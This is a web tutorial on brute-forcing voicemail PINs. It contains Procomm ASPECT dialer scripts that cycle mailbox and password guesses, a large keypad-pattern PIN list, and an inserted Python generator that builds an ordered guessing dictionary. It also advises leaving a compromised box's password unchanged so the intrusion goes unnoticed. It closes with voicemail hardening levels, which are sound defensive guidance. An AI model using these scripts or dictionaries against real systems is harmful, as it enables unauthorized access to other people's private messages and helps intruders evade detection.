Two programs that attempted to hack voicemail systems were written in the early 1990s, specifically Voicemail Box Hacker 3.0 and VrACK 0.51. I have attempted to use these tools in the past; they were primarily written for much older and less secure voicemail systems. The Voicemail Box Hacker program only allows testing of voicemail boxes with four-digit passwords, and it is not expandable in the versions we have worked with. VrACK has some interesting features, but it is difficult to script, was written for older x86-based machines, and is somewhat unstable in newer environments. Both programs were probably abandoned because of the relative unpopularity of hacking voicemail, so updates were never continued.
Hence, hacking voicemail leads us back to our trusty ASPECT scripting language.
Voicemail boxes can be brute forced in much the same way as the dial-up connections attacked with the ASPECT scripts described in the other sections of my site. The primary difference is in the assumptions: with voicemail you run the script and listen for a successful hit as it happens, instead of logging the results and going back later to see whether something occurred. This example is therefore an attended, manual hack. It takes patience, but it can work against the very simple passwords and password combinations that voicemail box users tend to choose.
To attempt to compromise a voicemail system, either manually or with a brute force script (social engineering is not used in this example), you need three things: the main access number of the voicemail system, a target voicemail box number (including its length, typically three, four or five digits), and an educated guess at the minimum and maximum length of the box password. In most modern organizations certain presumptions about voicemail security can usually be made, concerning minimum and maximum password length and default passwords, to name a few. A company would have to be insane not to turn on at least some minimum security, though we have seen it happen. Let's assume that there is some minimum security and that the voicemail boxes of our target company do have passwords. With that, let the scripting begin.
Our goal is to make something similar to the simple script shown below. Let's first examine what we want the script to do.
This simple script dials the voicemail system, waits for the auto attendant to play its greeting (for example, "Welcome to Company X's voicemail system, mailbox number please"), enters the voicemail box number, presses pound to accept, enters a password followed by pound, and then repeats the mailbox/password step once more within the same call. This example tests six passwords for voicemail box 5019, two per call.
With some ingenuity in your favorite programming language, you can easily generate this repetitive script from a dictionary of numbers of your choosing. You will most likely need to tweak the script and allow for modem characteristics and other hiccups: the same script can execute nicely on one system and poorly on another, so listening to the script as it runs and paying close attention to the process is invaluable.
Once you have your test prototype down, you can use the much larger dictionary of numbers discussed below.
Simple Voicemail Hacking Script in Procomm Plus ASPECT language
(THIS SAMPLE SCRIPT WORKS WITH NEWER VERSIONS OF PROCOMM and doesn't work with PCPLUSTD because WAITQUIET wasn't invented yet. You may need to tweak your settings to get it to work right. It is the concept of how to do it that I want to hit home.)
; ASP/WAS script for Procomm Plus Voicemail Hacking
; Written by M4phr1k, www.m4phr1k.com, Stephan Barnes
proc main
   ; Dial the access number, pause while the greeting plays (each comma is a
   ; dial-modifier pause), enter mailbox 5019#, then a password#, and repeat
   ; the mailbox/password pair once more in the same call.
   transmit "atdt*918005551212,,,,,5019#,111111#,,5019#,222222#,,"
   transmit "^M"
   WAITQUIET 37      ; give the whole dial string time to play out; listen for a hit
   HANGUP            ; drop the call before dialing the next pair
   transmit "atdt*918005551212,,,,,5019#,333333#,,5019#,555555#,,"
   transmit "^M"
   WAITQUIET 37
   HANGUP
   transmit "atdt*918005551212,,,,,5019#,666666#,,5019#,777777#,,"
   transmit "^M"
   WAITQUIET 37
   HANGUP
endproc
Below is a simple preview of what you'd need to tell a Procomm Plus ASPECT script to do in order to repeatedly hack a voicemail system.
Set up PCPLUSTD.
The premise: pretend the phone number is your target voicemail system (1800X66X665) and that the target mailbox is 9999.
The script below is an ATTENDED HACK, so you HAVE TO BE THERE LISTENING to the result. Or do you? (Yes, you do, unless you figure out a way to walk away and still be able to look for a hit if you get one.)
You may also have to adjust the WAITFOR time (shown as 33 below). Different phone systems connect at different speeds; 33 seconds is the length of this whole routine, and you may need to increase it to get to the end of the transmit. You'll see what I mean if you listen to it.
;; VOICEMAIL HACKING EXAMPLE
;; Stephan Barnes (M4phr1k)
;; Works with PCPLUSTD available on http://www.m4phr1k.com
;; You need to LISTEN to this! Hint...
;; Dial, pause for the greeting, press # then mailbox 9999, then try two
;; passwords in the same call; WAITFOR 33 keeps the line up for the 33-second routine.
TRANSMIT "atdt1800X66X665,,,,#,,9999,,111111#,,222222#,,,*"
TRANSMIT "^M"
WAITFOR 33
HANGUP
TRANSMIT "atdt1800X66X665,,,,#,,9999,,111112#,,232222#,,,*"
TRANSMIT "^M"
WAITFOR 33
HANGUP
;; you could go on and on....
The number of attempts is finite and depends on the maximum length of the password: the longer the password, the longer it theoretically takes to compromise the box. The downside, again, is that this is an attended hack, something you have to listen to while it runs. A clever person could tape-record the whole session and play it back later, or apply digital signal processing to look for anomalies and trends. Taped or live, you are listening for the anomaly and planning for failure most of the time.
The success message is usually something like "You have X new messages. Main menu...". Every voicemail system has a different auto attendant, and if you are not familiar with a particular target's attendant you might not know what to listen for. Don't shy away from that: you are listening for an anomaly in a field of failures, and once you try it you'll get the point quickly. Look at the finite math of brute forcing from 000000 to 999999 and you'll see that the time it takes to cover the whole key space is long, and each additional digit multiplies it by ten. Other methods are therefore useful to reduce the testing time.
So what can we do to reduce our finite testing time? One method is to try digits that people tend to remember easily. The phone keypad is an incubator for patterns because of its square layout; users might pick a password that traces a Z across the keys, such as 1235789. With that said, here is a list of patterns I have amassed, mostly from observing the phone keypad. It is not comprehensive, but it is a pretty good list to try. Remember to try the obvious things as well, such as a password that is the same as the voicemail box number, or repeating digits like 111111 that might be a temporary default password. The more revealing targets are boxes that have already been set up, but occasionally you will find a set of voicemail boxes that were created but never used by anyone. There's not much point in compromising boxes that have yet to be set up, unless you are an auditor trying to get people to listen and practice better security.
Sequence Pattern Examples:
123456
234567
345678
456789
567890
678901
789012
890123
901234
012345
654321
765432
876543
987654
098765
109876
210987
321098
432109
543210
123456789
987654321
Up and Down Patterns
147741
258852
369963
963369
159951
123321
456654
789987
987654
123369
147789
357753
Z's
1235789
9875321
Repeats
335577
115599
775533
995511
U: 1478963
Inverted U: 7412369
Right U: 1236987
Left U: 3214789
Angles |_: 14789
Angles _|: 78963
Angles -|: 12369
Angles |-: 32147
O's starting at diff points: 147896321
O's starting at diff points: 478963214
O's starting at diff points: 789632147
O's starting at diff points: 896321478
O's starting at diff points: 963214789
O's starting at diff points: 632147896
O's starting at diff points: 321478963
O's starting at diff points: 214789632
X's starting at diff points: 159357
X's starting at diff points: 357159
X's starting at diff points: 159753
X's starting at diff points: 753159
X's starting at diff points: 951357
X's starting at diff points: 357951
+'s starting at diff points: 258456
+'s starting at diff points: 258654
+'s starting at diff points: 456258
+'s starting at diff points: 456852
+'s starting at diff points: 654852
+'s starting at diff points: 654258
+'s starting at diff points: 852456
+'s starting at diff points: 852654
Z starting at diff points: 1235789
Z starting at diff points: 3215978
Z starting at diff points: 9875321
Z starting at diff points: 1895123
Top
Skip over across: 172839
Skip over across 1: 283917
Skip over across 2: 391728
Reverse
Skip over across: 392817
Skip over across 1: 281739
Skip over across 2: 173928
Bottom
Skip over across: 718293
Skip over across 1: 829371
Skip over across 2: 937182
Reverse
Skip over across: 938271
Skip over across 1: 827193
Skip over across 2: 719382
Left to right
Skip over across: 134679
Skip over across 1: 467913
Skip over across 2: 791346
Reverse
Skip over across: 316497
Skip over across 1: 649731
Skip over across 2: 973164
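The pattern classes listed above can be generated rather than typed. The following is an added Python example, not the author's own list or code: it derives each class (sequences with wrap-around, lines traced there and back, doubled lines, X and + crosses, Z's, angle/U/O walks around the keypad perimeter, and skip-over interleaves) from the 3x3 keypad geometry, prepends the obvious guesses (box number, reversed box number, repeated digits) and de-duplicates. Because it enumerates every start point and direction it emits some rotations the hand-made list omits; the mailbox 5019 used at the bottom is the page's sample box, not a real target.

```python
"""Keypad-pattern dictionary for voicemail password guessing.  Added example
for this page, not the original author's list or code: it derives the
pattern classes the page lists from the 3x3 keypad geometry, so it also
emits start points and directions the hand-made list omits.
"""
ROWS = ["123", "456", "789"]
COLS = ["147", "258", "369"]
DIAGS = ["159", "357"]
LINES = ROWS + COLS + DIAGS
RING = "12369874"   # perimeter keys clockwise from 1; the centre key 5 is not on it


def both_ways(s):
    return [s, s[::-1]]


def rotations(s):
    return [s[i:] + s[:i] for i in range(len(s))]


def sequences(length=6):
    """Ascending and descending digit runs, wrapping so 0 follows 9 (678901)."""
    out = []
    for start in range(10):
        out.append("".join(str((start + i) % 10) for i in range(length)))
        out.append("".join(str((start - i) % 10) for i in range(length)))
    return out


def there_and_back():
    """A row, column or diagonal traced out and back: 147741, 963369, 159951."""
    return [d + d[::-1] for line in LINES for d in both_ways(line)]


def doubled_lines():
    """Each key on a line pressed twice: 335577, 115599 (the page's 'Repeats')."""
    return ["".join(c * 2 for c in d) for line in LINES for d in both_ways(line)]


def ring_walks(cells):
    """`cells` consecutive perimeter keys from every start, both directions:
    5 cells gives the page's angles, 7 the U shapes, 8 (start key repeated
    at the end) the O shapes such as 147896321."""
    out = []
    for ring in both_ways(RING):
        for rot in rotations(ring):
            out.append(rot[:cells] + (rot[0] if cells == len(ring) else ""))
    return out


def crosses():
    """X (both diagonals) and + (middle column and row), every order/direction."""
    out = []
    for a, b in [(DIAGS[0], DIAGS[1]), (COLS[1], ROWS[1])]:
        for first, second in [(a, b), (b, a)]:
            out += [f + s for f in both_ways(first) for s in both_ways(second)]
    return out


def zees():
    """Z's: one outer row, the centre key, then the other outer row: 1235789."""
    return [f + "5" + s for top, bot in [(ROWS[0], ROWS[2]), (ROWS[2], ROWS[0])]
            for f in both_ways(top) for s in both_ways(bot)]


def skip_overs():
    """Interleave two parallel lines (top/bottom rows or left/right columns),
    with the pairs swapped and/or reversed, rotated a pair at a time: 172839,
    283917, 392817, 718293, 134679, 316497."""
    out = []
    for a, b in [(ROWS[0], ROWS[2]), (COLS[0], COLS[2])]:
        for swap in (False, True):
            pairs = [(y, x) if swap else (x, y) for x, y in zip(a, b)]
            for rev in (False, True):
                seq = "".join(x + y for x, y in (pairs[::-1] if rev else pairs))
                out += rotations(seq)[::2]   # rotate by whole pairs only
    return out


def obvious(mailbox):
    """The box number, the box number reversed, and repeated digits (111111)."""
    return [mailbox, mailbox[::-1]] + [d * 6 for d in "0123456789"]


def dictionary(mailbox):
    """Ordered, de-duplicated candidate list with the cheapest guesses first."""
    cands = (obvious(mailbox) + sequences() + there_and_back() + doubled_lines()
             + crosses() + zees() + ring_walks(5) + ring_walks(7) + ring_walks(8)
             + skip_overs())
    return list(dict.fromkeys(cands))   # keeps first occurrence, preserves order


if __name__ == "__main__":
    words = dictionary("5019")        # 5019 is the page's sample mailbox
    print(len(words), "candidates, e.g.", ", ".join(words[:8]))
```

The order of dictionary() is deliberate: defaults and box-number guesses cost one attempt each and hit most often, so they go first; the geometric walks are tried last. The same list, fed to a script generator, becomes the "much larger dictionary" the text mentions.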
IF you were successful:
Once you have compromised a target, be careful not to change anything. If you change the password of the box it might get noticed, unless the owner is not a heavy voicemail user or is out of town or on vacation. Companies that have policies to change voicemail passwords every X days, as they do for computing systems, are very rare; once someone sets a password, they rarely change it. Listening to other people's messages might land you in jail, so we are not preaching that you should try to get onto a voicemail system this way. As always, we are pointing out the theoretical ways in which voicemail can be hacked.
Lastly, this brute force method could benefit from automating the listening for the anomaly. I have theorized that if the analog voice could be captured into some kind of digital signal processing (DSP) device, or if a speech-to-text program were trained properly and listened for the anomaly in the background, it might save having to sit and listen to the script.
Example levels of security for voicemail systems:
Considering the relative ease with which you can hack voicemail, here are some levels of protection to consider.
-----------------------------------------------------------------------------------------------------------------------------------------
Bronze: a VM system that you have configured to have
a minimum password length of at least 8 digits, probably no more than 16;
doesn't allow repeating digits (e.g. 11111111);
doesn't allow sequences (e.g. 12345678);
doesn't allow the same number as the voicemail box, forward or backward;
inactivates unused voicemail boxes (ones that new users have not set up) within 5 days of their creation;
locks out a user after 10 failed password attempts (a longer or shorter threshold depends upon your user base);
doesn't automatically reset the failed-attempt counter after a certain amount of time (a timed reset lets a slow, patient brute force stay under the lockout threshold);
password resets and failed-attempt counter resets must be performed manually by the system administrator.
-----------------------------------------------------------------------------------------------------------------------------------------
Silver: all of the above, but also forces a password change every 90 to 180 days.
-----------------------------------------------------------------------------------------------------------------------------------------
Gold: all of the above, but adds a challenge-response mechanism for access to the voicemail system.
(Note: I have rarely seen this implemented, although I have heard it is possible; it would be for voicemail systems of an EXTREMELY sensitive nature.)
-----------------------------------------------------------------------------------------------------------------------------------------
Bottom line: don't assume that general security is protecting your voicemail, so don't leave sensitive information in voicemail.